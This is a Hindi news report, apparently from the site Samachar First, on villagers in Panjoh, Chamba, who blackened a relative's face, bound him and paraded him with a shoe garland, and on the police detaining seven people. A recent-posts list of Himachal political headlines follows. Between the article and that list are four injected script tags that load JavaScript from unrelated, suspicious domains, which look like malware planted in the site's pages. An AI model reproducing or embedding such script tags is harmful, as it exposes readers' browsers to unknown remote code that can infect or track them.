चंबाः मुंह पर कालिक पोत, गले में जूते की माला पहनाकर गांव में घुमाया व्यक्ति

<p>जिला चंबा के पंजोह गांव में कुछ महिलाओं द्वारा एक व्यक्ति को बंधक बनाकर मुंह पर कालिख पोत और बिना कमीज के पूरे गांव में घुमाने का मामला सामने आया है। दरअसल, यह मामला चंबा जिला के पंजोंह&nbsp; गांव का है। जहां पर एक परिवार में आपसी झगड़े को लेकर कुछ महिलाओं ने अपने ही सगे रिश्तेदार को घर से बाहर निकाल कर उसके मुंह पर कालिख पोत उसे पूरे गांव का चक्कर लगाया। बाद में&nbsp; पीड़ित व्यक्ति ने पुलिस में इस बात की शिकायत दर्ज़ करवाई। पुलिस ने तुरंत कार्रवाई करते हुए 5 महिलाओं और 2 युवकों को हिरासत में ले लिया और उन्हें कोर्ट में पेश कर उनका 2 दिन का रिमांड लिया गया। अब न्यायालय में आगे की कार्रवाई जारी है।</p>

<p>इस&nbsp; बात की जानकारी देते हुए डीएसपी चम्बा अजय कुमार&nbsp; ने बताया कि पंजोह गांव से एक शिकायत आई थी कि गांव में&nbsp; कुछ महिलाओं ने अपने ही रिश्तेदार को सुबह घर से निकाला और उसके हाथ बांधकर उसके मुंह पर कालिख पोथ कर पूरे गांव का चक्कर लगाया। उन्होंने बताया कि शिकायतकर्ता की पत्नी मायके गई हुई थी। वह अपने बेटे के साथ घर पर था। सुबह कुछ महिलाओं औऱ पुरुषों ने उसके घर जाकर आवाजें लगाई और काम होने की बात कहते हुए दरवाजा खोलने को कहा औऱ 2 महिलाओं ने उसे कमरे से बाहर खींचा और उनके साथ और लोग भी थे। वह सब उसे जबरदस्ती घर के बाहर ले गए और उसके साथ जबरदस्ती हाथ पैर बांध कर कालिख पोती औऱ गले में जूतों की माला पहनाई। जैसे ही पीड़ित की शिकायत उनके पास पहुंची उन्होंने 5 महिलाओं और 2 पुरुषों को हिरासत में लेकर कोर्ट में पेश किया और उनका रिमांड लिया और अब न्यायलय में&nbsp; इन सभी लोगों पर कार्रवाई जारी है। उन्होंने बताया की इन दोनों परिवारों&nbsp; के बीच पहले भी आपसी झगड़े को लेकर मामला दर्ज़&nbsp; किया गया था।</p>

<p>&nbsp;</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1580279895493″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

भाजपा दुनिया की सबसे बड़ी पार्टी और मोदी दुनिया के सबसे बड़े नेता है: जयराम ठाकुर

बद्दी में वसूला जा रहा है गुण्डा टैक्स, पलायन कर रहे उद्योग, चरम पर भ्रष्टाचार…

7 seconds ago

धूमल चुनाव हारते नहीं, तो कभी सीएम नहीं बनते जयरामः कांग्रेस

एक्सीडेंट्ल चीफ़ मिनिस्टर थे जयराम ठाकुरः कांग्रेस  धूमल चुनाव हारते नहीं, तो कभी सीएम नहीं…

13 mins ago

“ख़रीद-फरीख्त की राजनीति शुरू कर भाजपा ने प्रदेश की संस्कृति को कलंकित किया”

ख़रीद-फरीख्त की राजनीति शुरू कर भाजपा ने प्रदेश की संस्कृति को कलंकित कियाः सीएम मैंने…

16 mins ago

OPS को लेकर कर्मचारियों को गुमराह कर रही भाजपा: जगत सिंह नेगी

OPS को लेकर कर्मचारियों को गुमराह कर रही भाजपा, हिमाचल में भी OPS बंद होने…

18 hours ago

कांग्रेसियों के वादे भाजपा ने किए पूरे: मीनाक्षी लेखी

कांग्रेसियों के वादे भाजपा ने किया पूरे, 2014 से पहले संसद-विधानसभा में पारित होते थे…

20 hours ago

हिमाचल सरकार के मंत्री अनिरुद्ध सिंह का दावा, देश में 250 के पार भी नहीं जा रही भाजपा

हिमाचल सरकार के मंत्री अनिरुद्ध सिंह का दावा, देश में 250 के पार भी नहीं…

20 hours ago